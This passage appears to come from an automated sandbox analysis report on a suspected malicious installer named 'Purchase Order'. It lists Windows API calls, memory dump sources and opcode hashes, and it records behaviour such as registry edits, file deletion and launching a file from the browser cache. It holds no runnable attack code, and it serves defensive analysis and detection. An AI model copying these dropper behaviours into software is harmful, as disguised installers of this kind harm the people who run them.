                                                                                                  • Opcode ID: 5b6ae2104ab0ec81b4e73fa48072ed289b5e7c7f1ead31899d3077504e5afad2
                                                                                                  • Instruction ID: 45e0d9c6199636d87fa33ccb5d6651f7628d4ee42d5e4054af8bad143df77737
                                                                                                  • Opcode Fuzzy Hash: 5b6ae2104ab0ec81b4e73fa48072ed289b5e7c7f1ead31899d3077504e5afad2
                                                                                                  • Instruction Fuzzy Hash: D1714771E00228DBDF28CF98C844BADBBB1FF44305F15806AD956BB291C778AA56DF44
                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 0040310C
                                                                                                    • Part of subcall function 00403277: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F75,?), ref: 00403285
                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403022,00000004,00000000,00000000,?,?,00402F9C,000000FF,00000000,00000000,00409130,?), ref: 0040313F
                                                                                                  • SetFilePointer.KERNELBASE(00286DC5,00000000,00000000,004128D8,00004000,?,00000000,00403022,00000004,00000000,00000000,?,?,00402F9C,000000FF,00000000), ref: 0040323A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FilePointer$CountTick
                                                                                                  • String ID:
                                                                                                  • API String ID: 1092082344-0
                                                                                                  • Opcode ID: f6133f0060067ae216a0a077ebe86ad3920cfc852d280aeddc091818d184f87e
                                                                                                  • Instruction ID: b8bc3f79dcbb40427391aad23e9a2a3a4e055ade3e5059820f7b6748c1a5a64e
                                                                                                  • Opcode Fuzzy Hash: f6133f0060067ae216a0a077ebe86ad3920cfc852d280aeddc091818d184f87e
                                                                                                  • Instruction Fuzzy Hash: 3131A2B29042109BDB10BF29EE8086A3BECF754756715823FE501B22E0C738DD52DB5E
                                                                                                  APIs
                                                                                                    • Part of subcall function 004061FB: FindFirstFileA.KERNELBASE(75923410,00421580,C:\,00405A9A,C:\,C:\,00000000,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0), ref: 00406206
                                                                                                    • Part of subcall function 004061FB: FindClose.KERNEL32(00000000), ref: 00406212
                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402281
                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040228B
                                                                                                  • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004022B3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                  • String ID:
                                                                                                  • API String ID: 1486964399-0
                                                                                                  • Opcode ID: 68b53b7b15cd5aa11021285071f00655329fa620989aceaac5983d704ca72be5
                                                                                                  • Instruction ID: 0317ded50e63044e70734c05992738adc8c04a0539f45c02fec05e083cfe155c
                                                                                                  • Opcode Fuzzy Hash: 68b53b7b15cd5aa11021285071f00655329fa620989aceaac5983d704ca72be5
                                                                                                  • Instruction Fuzzy Hash: 15113071E14219AACB10EFF5DA49A9EBAB8AF44314F14447FB100FB2C2D6BDC5418B69
                                                                                                  APIs
                                                                                                    • Part of subcall function 00405110: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                                                                                    • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                                                                                    • Part of subcall function 00405110: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
                                                                                                    • Part of subcall function 00405110: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll), ref: 0040517E
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                                                                                    • Part of subcall function 00405688: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 004056B1
                                                                                                    • Part of subcall function 00405688: CloseHandle.KERNEL32(?), ref: 004056BE
                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401EED
                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EFD
                                                                                                  • CloseHandle.KERNELBASE(?,00000000,000000EB,00000000), ref: 00401F22
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 3521207402-0
                                                                                                  • Opcode ID: e995d9f419432ab23205a23d5c1414ada8c426ee2d3ef18cbb1adcd6d691f71f
                                                                                                  • Instruction ID: d3d55c0d0bbc33f725c23921dd181786adb59914180f86dd2947d51e8879a6ae
                                                                                                  • Opcode Fuzzy Hash: e995d9f419432ab23205a23d5c1414ada8c426ee2d3ef18cbb1adcd6d691f71f
                                                                                                  • Instruction Fuzzy Hash: 3C019231E04106EBCF20AF91CD49AAE7BB1EB40314F10807BF605B61E1C7794A859B9E
                                                                                                  APIs
                                                                                                    • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,000004B9,00000000,00000022,00000000,?,?), ref: 00402C00
                                                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402527
                                                                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040253A
                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsj39BE.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Enum$CloseOpenValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 167947723-0
                                                                                                  • Opcode ID: 05547f92edfa2ad71c40473a60083347d41093bd1c43fb3d169fc0aa66b556e7
                                                                                                  • Instruction ID: 11bb5dddaf85e4de06b60e46a4a286c6c0f73d8de59455db5a8421e4b605592f
                                                                                                  • Opcode Fuzzy Hash: 05547f92edfa2ad71c40473a60083347d41093bd1c43fb3d169fc0aa66b556e7
                                                                                                  • Instruction Fuzzy Hash: 5601DFB1A04201FFE7119F65AD88ABF7ABCDF40395F20003FF105A61C0D6B84A41966A
                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,00406023,00000000,00000002,?,00000002,?,?,00406023,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E07
                                                                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00406023,?,00406023), ref: 00405E28
                                                                                                  • RegCloseKey.KERNELBASE(?), ref: 00405E49
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3677997916-0
                                                                                                  • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                                  • Instruction ID: a5bfd4e994019c5e115080bbecddc2f5f1976c63067f757e38b3d402cdd28771
                                                                                                  • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                                  • Instruction Fuzzy Hash: 5F014C7154020AEFDB118F64DD48EDB3FACEF14354B004036FA4596220D235DA64CBA5
                                                                                                  APIs
                                                                                                    • Part of subcall function 00405B45: GetFileAttributesA.KERNELBASE(?,?,0040575D,?,?,00000000,00405940,?,?,?,?), ref: 00405B4A
                                                                                                    • Part of subcall function 00405B45: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B5E
                                                                                                  • RemoveDirectoryA.KERNEL32(?,?,?,00000000,00405940), ref: 0040576C
                                                                                                  • DeleteFileA.KERNELBASE(?,?,?,00000000,00405940), ref: 00405774
                                                                                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040578C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                  • String ID:
                                                                                                  • API String ID: 1655745494-0
                                                                                                  • Opcode ID: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
                                                                                                  • Instruction ID: 95a73edef03a3fe4ea7fa24255aadd7873cdb690117aa2712c5123595e980fc6
                                                                                                  • Opcode Fuzzy Hash: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
                                                                                                  • Instruction Fuzzy Hash: F2E02B31108A9197C21067349D0CB5F6AD5EFC6314F044A36F991F31C1C73858069EBE
                                                                                                  APIs
                                                                                                  • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\professionalizing,?), ref: 00401E9F
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\professionalizing, xrefs: 00401E8A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExecuteShell
                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\professionalizing
                                                                                                  • API String ID: 587946157-2517315260
                                                                                                  • Opcode ID: 62972551e4f607768522ca5215d0e9555a819d9815caab0e71c71de7bb35adcf
                                                                                                  • Instruction ID: 7c51c884e7587c3efeb31cb3e5c9943a81f4090218bfe93557c80408bc49aec8
                                                                                                  • Opcode Fuzzy Hash: 62972551e4f607768522ca5215d0e9555a819d9815caab0e71c71de7bb35adcf
                                                                                                  • Instruction Fuzzy Hash: 58F0F671B14104BADB21ABB59F4AE6D2AA5DB81318F38043BF050F71C2D9FD8942DB28
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2762281649.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2762228322.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762310776.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762334808.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnumErrorLastWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 14984897-0
                                                                                                  • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                  • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                                                  • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                                  • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,00402F9C,000000FF,00000000,00000000,00409130,?), ref: 00403015
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FilePointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 973152223-0
                                                                                                  • Opcode ID: a1130b4f43b5ef58eef6a304646b232a08a6a9d0fa451b453d71d72267b47fb8
                                                                                                  • Instruction ID: 0c39837240ac6e21a4d945e0ab2cbfd2cf40700f690e74d620895d0cf024726c
                                                                                                  • Opcode Fuzzy Hash: a1130b4f43b5ef58eef6a304646b232a08a6a9d0fa451b453d71d72267b47fb8
                                                                                                  • Instruction Fuzzy Hash: 83316D30202219FFDB109F56EC85A9A3AACEB00355F20C53AF905E6195D339DE40EBA9
                                                                                                  APIs
                                                                                                    • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,000004B9,00000000,00000022,00000000,?,?), ref: 00402C00
                                                                                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B3
                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsj39BE.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3677997916-0
                                                                                                  • Opcode ID: 842ccded7b04f1c996c394db29755cab0eaefbc32d4fd585d2de1ae204d8f70a
                                                                                                  • Instruction ID: 85d806923b24475f53c36965a20abc0d18f92dd5d526b72c5aa3047674b5102d
                                                                                                  • Opcode Fuzzy Hash: 842ccded7b04f1c996c394db29755cab0eaefbc32d4fd585d2de1ae204d8f70a
                                                                                                  • Instruction Fuzzy Hash: 7611C171A04205FFDB20CF60CA985AEBBB4AF00359F20443FE142B72C0D2B84A85DB5A
                                                                                                  APIs
                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  • Opcode ID: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
                                                                                                  • Instruction ID: 8ec6bfb8ef4f3ff43576048fe9568e939b5e998f238dec90285f5c94a9fc96e2
                                                                                                  • Opcode Fuzzy Hash: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
                                                                                                  • Instruction Fuzzy Hash: 2201F431B24210ABE7294B389E04B6A36A8F710314F11823BF911F66F1D7B8DC029B4D
                                                                                                  APIs
                                                                                                    • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,000004B9,00000000,00000022,00000000,?,?), ref: 00402C00
                                                                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402396
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040239F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseDeleteOpenValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 849931509-0
                                                                                                  • Opcode ID: ce34e0a5a3cad0306182936bac4226b47a4e95e33cdd8971417c4bf24fbf648c
                                                                                                  • Instruction ID: 7cc126104223fee90c4482272470a44d0e33bb4baa6becb9c0b30a5ba769ccb5
                                                                                                  • Opcode Fuzzy Hash: ce34e0a5a3cad0306182936bac4226b47a4e95e33cdd8971417c4bf24fbf648c
                                                                                                  • Instruction Fuzzy Hash: 25F0A472A00111ABD720AFA09A8E9BE76B89B40344F24043BF201B71C0D5BD5D028769
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(00000000,00000011), ref: 004025B1
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll, xrefs: 004025A2, 004025C7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
